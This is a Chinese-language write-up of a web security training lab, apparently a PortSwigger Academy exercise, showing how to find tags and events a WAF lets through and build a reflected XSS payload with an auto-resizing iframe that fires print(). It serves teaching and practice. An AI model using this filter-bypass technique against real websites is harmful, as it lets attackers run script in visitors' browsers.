# Cross-site scripting Lab14 本題是過濾大部分 XSS 標籤與事件的環境下,繞過 WAF 實現自動觸發 print() 的 XSS。 一樣先進入網站。  先丟個 XSS 攻擊語法上去,搜尋的目的不是為了嘗試觸發,而是要擷取請求,並丟到 Intruder 上。  這裡我們要測試有哪個標籤是沒有被過濾的,所以也利用官方給的列表去爆破。   這裡抓到 body 跟 custom tags 是可以的。  接著是看那些事件沒有被過濾掉的。  這裡發現 `onresize` 沒被擋。  所以我們結合起來: ``` "><body onresize=print()> ``` 這段會因為 `onresize` 是無互動觸發就能執行,解法可以寫進 iframe: ``` <iframe src="https://0ace006d03a9e26d80a9f36d00110049.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload="this.style.width='100px'"> </iframe> ```   ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up